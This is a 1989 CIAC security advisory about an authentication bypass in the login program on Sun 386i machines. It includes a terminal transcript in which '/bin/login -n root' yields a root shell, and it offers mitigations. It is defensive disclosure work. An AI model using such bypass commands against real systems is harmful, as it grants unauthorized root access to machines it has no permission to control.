55 lines
1.9 KiB
Plaintext
55 lines
1.9 KiB
Plaintext
|
|
|||
|
________________________________________________________________
|
|||
|
THE COMPUTER INCIDENT ADVISORY CAPABILITY
|
|||
|
|
|||
|
CIAC
|
|||
|
|
|||
|
ADVISORY NOTICE
|
|||
|
________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
COMPUTER SECURITY INFORMATION
|
|||
|
|
|||
|
Authentication bypass in Sun 386i machines
|
|||
|
|
|||
|
The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun
|
|||
|
OS (SOS), accepts the argument "-n" which bypasses authentication. It was
|
|||
|
apparently added in order to allow the Sun program "logintool" to do the
|
|||
|
authentication and have login do the housekeeping. This allows a user who
|
|||
|
discovers the new argument to the login program to become a root user in
|
|||
|
several ways. An example of one method is attached.
|
|||
|
|
|||
|
A temporary solution is to disable logintool and patch the binary using
|
|||
|
the "strings" and "adb"method used last November. Alternatively and more
|
|||
|
simly, log in a root and issue the command
|
|||
|
|
|||
|
chmod 110 /bin/login
|
|||
|
|
|||
|
Example of login endrun:
|
|||
|
---------------------------------------------------
|
|||
|
Script started on Tue Apr 11 14:16:25 1989
|
|||
|
myhost[1] whoami
|
|||
|
oconnor
|
|||
|
myhost[2] /bin/login -n root
|
|||
|
Login incorrect
|
|||
|
login: onceuponatime
|
|||
|
No home directory specified in password file! Logging in with home=/
|
|||
|
# whoami
|
|||
|
root
|
|||
|
# who a i
|
|||
|
myhost!onceupon ttyp2 Apr 11 14:17
|
|||
|
# ^D myhost1[3] ^D
|
|||
|
script done on Tue Apr 11 14:17:34 1989
|
|||
|
---------------------------------------------------
|
|||
|
|
|||
|
Sun is presently working on a patch. When it is available, CIAC will
|
|||
|
inform you accordingly.
|
|||
|
|
|||
|
For questions or additional information, please contact
|
|||
|
|
|||
|
Gene Schultz
|
|||
|
CIAC Team Leader
|
|||
|
(415) 422-8193 or FTS 532-8193
|
|||
|
gschultz%nsspa@icdc.llnl.gov
|
|||
|
|
|||
|
|